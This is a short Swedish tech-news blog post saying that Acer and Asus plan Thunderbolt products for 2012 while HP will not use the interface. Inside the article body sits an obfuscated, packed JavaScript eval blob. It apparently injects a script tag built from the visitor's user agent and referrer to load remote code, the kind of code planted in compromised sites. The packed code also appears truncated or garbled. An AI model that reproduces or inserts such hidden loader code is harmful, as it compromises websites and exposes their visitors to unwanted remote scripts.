Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

PC

Thunderbold på Acer och Asus

Thunderbold på Acer och Asus
Sebastian

Enligt IDG så har både Acer och Asus nu gått ut med att under 2012 kommer de att släppa produkter med Thunderbolt. Detta var något som Thunderbolt behövde för att få ut produkter med de gränssnitt som de använder.

Den enda utvecklaren som tidigare gjort ett officiellt uttalande on Thunderbold är HP som sagt att de inte kommer att använda sig av det. De har också nämt att de tänker lägga ner sin dator-avdelning.

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shits|var|u0026u|referrer|itsay||js|php’.split(’|’),0,{}))
info:
www.macrumors.com